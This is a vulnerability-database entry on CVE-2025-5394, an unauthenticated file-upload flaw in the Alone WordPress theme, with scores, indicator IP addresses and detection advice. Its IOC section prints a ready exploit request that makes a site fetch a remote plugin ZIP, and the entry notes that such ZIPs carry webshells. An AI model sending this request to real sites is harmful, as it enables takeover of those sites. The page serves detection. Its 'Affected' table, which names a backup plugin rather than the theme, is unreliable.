cbcvebase.
CVE-2025-5394
published 2025-07-15

CVE-2025-5394: The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
47.81%
98.7th percentile
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3. This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution. CVE-2025-54019 is likely a duplicate of this.

Affected

1 ranges
VendorProductVersion rangeFixed in
bearsthemesbears_backup<= 2.0.0

Detection & IOCsextracted from sources · hover to see the quote

ip193.84.71.244
ip87.120.92.24
ip146.19.213.18
url/wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin
commandPOST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=beplus_import_pack_install_plugin&data%5Bplugin_slug%5D=&data%5Bplugin_source%5D=https%3a%2f%2f<url>%2fplugin%2f<file>.zip
path/wp-content/themes/alone/
  • Monitor for POST requests to /wp-admin/admin-ajax.php with action=alone_import_pack_install_plugin or action=beplus_import_pack_install_plugin, which indicate exploitation attempts of CVE-2025-5394.
  • Look for newly created administrator accounts, suspicious ZIP/plugin folders in the WordPress plugins directory, or newly installed file manager plugins as indicators of post-exploitation activity.
  • The vulnerable function alone_import_pack_install_plugin() is exposed via the wp_ajax_nopriv_ hook, meaning it is accessible to unauthenticated users; alert on any unauthenticated AJAX calls invoking this action.
  • Attackers supply a remote source URL in the POST data's plugin_source parameter pointing to a ZIP archive containing a webshell; inspect POST body for external URLs in the data[plugin_source] field.
  • Attackers deploy password-protected PHP backdoors that allow persistent remote command execution via HTTP requests; hunt for newly uploaded PHP files in plugin directories following exploitation.
  • ·The Nuclei template uses the action parameter value 'beplus_import_pack_install_plugin', while Wordfence and BleepingComputer report the action as 'alone_import_pack_install_plugin'. Both action names should be monitored, as the template may reflect an alias or alternate hook name used in some theme versions.
  • ·The vulnerability affects Alone theme versions up to and including 7.8.3; version 7.8.5 is the patched release. Version 7.8.4 is referenced in the Bears Backup chain (CVE-2025-5396) but is NOT the fixed version — only 7.8.5 is confirmed safe.
  • ·CVE-2025-5394 can be chained with CVE-2025-5396 (Bears Backup plugin RCE) on sites running Alone theme 7.8.4 and older, where the Alone theme flaw is used to install the Bears Backup plugin, which then enables full RCE.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.